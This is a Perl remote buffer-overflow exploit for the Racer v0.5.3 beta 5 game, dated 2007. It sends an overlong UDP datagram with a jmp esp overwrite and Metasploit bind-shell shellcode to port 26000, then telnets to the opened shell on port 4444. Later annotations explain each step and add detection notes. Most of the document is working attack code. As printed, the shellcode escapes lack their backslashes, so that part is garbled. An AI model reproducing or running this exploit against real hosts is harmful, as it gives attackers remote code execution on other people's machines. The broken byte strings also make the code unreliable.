# Title : Racer v0.5.3 beta 5 Remote Buffer Overflow Exploit
# Published : 2007-08-13
# Author : n00b
#!/usr/bin/perl
###Credits to n00b.
################################################
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.
#Racer is also prone to a buffer overflow in the
#server and client. Automatically the game opens
#UDP port 26000 and waits for a message buffer.
#If we send an overly long buffer we are able to
#control the EIP register, and ESP holds enough
#buffer for a good-sized shellcode.
###############################################
#Tested: Win Xp sp2 English
#Vendor's web site: http://www.racer.nl/
#Affected versions: all versions.
#Tested on: Racer v0.5.3 beta 5 (12-03-07).
#Special thanks to str0ke.
###########################
# Advisory banner, printed to STDOUT. The heredoc terminator is unquoted, so
# the body interpolates like a double-quoted string: the "@fakehalo" on the
# shout-outs line is read as the (empty, never-declared) array @fakehalo and
# therefore prints as just "v9". No strict/warnings are enabled anywhere in
# this script, so nothing reports that.
print <<End;
*****************************************************
Racer v0.5.3 beta 5 (12-03-07) remote exploit
=====================================================
Credit's to n00b for finding this bug and writing
the exploit.This exploit work's for the client
and the server.
*****************************************************
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*****************************************************
Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo
Luigi Auriemma.
*****************************************************
(*)Please wait
End
# Cosmetic pause, then clear the console. "cls" is the Windows shell command
# (the header says the script was tested on Win XP SP2); system()'s return
# value is not checked, so on other platforms the failure is ignored.
sleep 8;
system("cls");
# `use` runs at compile time, so placing it after runtime statements is
# harmless.
use IO::Socket;
# Target address is taken verbatim from the first command-line argument. With
# no `use strict`, every variable below is an implicitly created package
# global.
$ip = $ARGV[0];
# Leading filler: 1001 bytes of "A" ahead of the return-address slot.
$payload1 = "A"x1001;
#jmp esp 0x77D8AF0A user32.dll english
# Author's note above: the four bytes that overwrite the saved return address
# (stored low byte first). Per that note it is specific to the English
# user32.dll of the single tested platform listed in the header.
$jmpcode = "x0AxAFxD8x77";
#win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
#http://metasploit.com */.
# Author's note above: Metasploit-generated bind shell, 696 bytes, alphanumeric
# (Alpha2) encoded, listening on TCP/4444 -- the port the later telnet step
# connects to. From a defender's view, the observable artefact is the game
# process opening a new TCP/4444 listener right after a UDP/26000 datagram.
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax67".
"x58x30x41x31x50x42x41x6bx42x41x77x32x42x42x42x32".
"x41x41x30x41x41x58x38x42x42x50x75x5ax49x49x6cx72".
"x4ax48x6bx32x6dx48x68x4cx39x39x6fx39x6fx69x6fx43".
"x50x6ex6bx50x6cx66x44x41x34x4cx4bx73x75x47x4cx6c".
"x4bx43x4cx57x75x30x78x75x51x7ax4fx4cx4bx42x6fx34".
"x58x4ex6bx41x4fx37x50x46x61x7ax4bx42x69x4ex6bx46".
"x54x6cx4bx63x31x6ax4ex50x31x49x50x4cx59x6ex4cx6f".
"x74x49x50x32x54x74x47x6fx31x6bx7ax44x4dx46x61x6f".
"x32x4ax4bx4ax54x77x4bx31x44x51x34x55x78x31x65x4b".
"x55x6cx4bx33x6fx75x74x63x31x38x6bx35x36x4ex6bx44".
"x4cx70x4bx4ex6bx43x6fx55x4cx36x61x78x6bx36x63x66".
"x4cx4ex6bx6fx79x42x4cx31x34x57x6cx75x31x78x43x75".
"x61x39x4bx50x64x4cx4bx57x33x34x70x4cx4bx77x30x64".
"x4cx4cx4bx70x70x37x6cx4cx6dx6ex6bx61x50x74x48x31".
"x4ex30x68x6cx4ex62x6ex44x4ex78x6cx72x70x39x6fx79".
"x46x63x56x76x33x70x66x42x48x56x53x37x42x53x58x62".
"x57x41x63x54x72x63x6fx51x44x59x6fx5ax70x50x68x7a".
"x6bx6ax4dx4bx4cx47x4bx62x70x59x6fx6ex36x71x4fx6f".
"x79x4dx35x43x56x6bx31x4ax4dx33x38x34x42x31x45x52".
"x4ax55x52x79x6fx6ex30x73x58x6ax79x77x79x4cx35x4c".
"x6dx52x77x39x6fx69x46x72x73x71x43x61x43x41x43x30".
"x53x42x63x46x33x42x63x71x43x4bx4fx58x50x71x76x30".
"x68x32x31x71x4cx65x36x41x43x6bx39x58x61x6ax35x63".
"x58x59x34x76x7ax30x70x4bx77x61x47x49x6fx4ax76x71".
"x7ax42x30x53x61x41x45x6bx4fx5ax70x53x58x6ex44x6c".
"x6dx64x6ex6dx39x36x37x49x6fx4bx66x73x63x30x55x39".
"x6fx4ex30x52x48x4dx35x41x59x6fx76x32x69x70x57x49".
"x6fx4ex36x66x30x66x34x30x54x43x65x4bx4fx4ax70x4f".
"x63x63x58x39x77x50x79x68x46x64x39x36x37x39x6fx4e".
"x36x70x55x4bx4fx6ex30x63x56x31x7ax32x44x42x46x31".
"x78x33x53x72x4dx4dx59x78x65x50x6ax52x70x70x59x57".
"x59x38x4cx6bx39x5ax47x31x7ax72x64x4ex69x4bx52x70".
"x31x49x50x78x73x4ex4ax4bx4ex71x52x56x4dx6bx4ex72".
"x62x34x6cx4fx63x6ex6dx33x4ax77x48x4ex4bx6cx4bx4c".
"x6bx55x38x32x52x6bx4ex58x33x56x76x59x6fx70x75x43".
"x74x49x6fx7ax76x43x6bx36x37x70x52x36x31x31x41x31".
"x41x52x4ax54x41x70x51x51x41x50x55x63x61x6bx4fx58".
"x50x73x58x4cx6dx79x49x43x35x4ax6ex31x43x4bx4fx7a".
"x76x71x7ax59x6fx4bx4fx64x77x6bx4fx38x50x4cx4bx50".
"x57x79x6cx4cx43x5ax64x70x64x4bx4fx4ex36x33x62x79".
"x6fx6ex30x41x78x4cx30x6fx7ax43x34x51x4fx50x53x79".
"x6fx4ax76x4bx4fx4ex30x67";
# Trailing filler: 500 bytes of "B" after the shellcode.
$payload2 = "B"x500;
# Abort when no target address was supplied on the command line.
if(!$ip)
{
die "remember the ipn";
}
# Game port and transport named in the header. UDP is connectionless, so the
# constructor's Timeout only covers local socket setup: an unreachable host or
# closed port is generally not detected here, and the send below "succeeds"
# whether or not anything is listening.
$port = '26000';
$protocol = 'udp';
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service
is running on the portn";
# Bare block (no loop or condition). A single datagram: 1001-byte filler, the
# 4-byte return-address overwrite, the shellcode (696 bytes per the author's
# comment) and 500 bytes of trailing filler -- roughly 2.2 KB in all. For
# detection, one unsolicited ~2.2 KB datagram to UDP/26000 made mostly of
# repeated "A"/"B" bytes, followed by the game process opening a TCP/4444
# listener, is the pattern to alert on. The trailing comma in the print list
# is harmless.
{
print $socket $payload1,$jmpcode,$shellcode,$payload2,;
print "[+]Sending malicious payload.n";
sleep 2;
system("cls");
print "[+]Done !!.n";
close($socket);
# Inner bare block: waits, then hands off to the system telnet client through
# the shell. $host is never assigned anywhere in this script (no `use strict`
# to catch it), so it interpolates as an empty string -- $ip was presumably
# intended. $ip is interpolated unquoted into the shell command line. The
# second close() acts on an already-closed handle and is a no-op.
{
sleep 5;
print " + Connecting on port 4444 of $host ...n";
system("telnet $ip 4444");
close($socket);
}
}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
# C:\Documents and Settings\****\Desktop\racer053b5>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~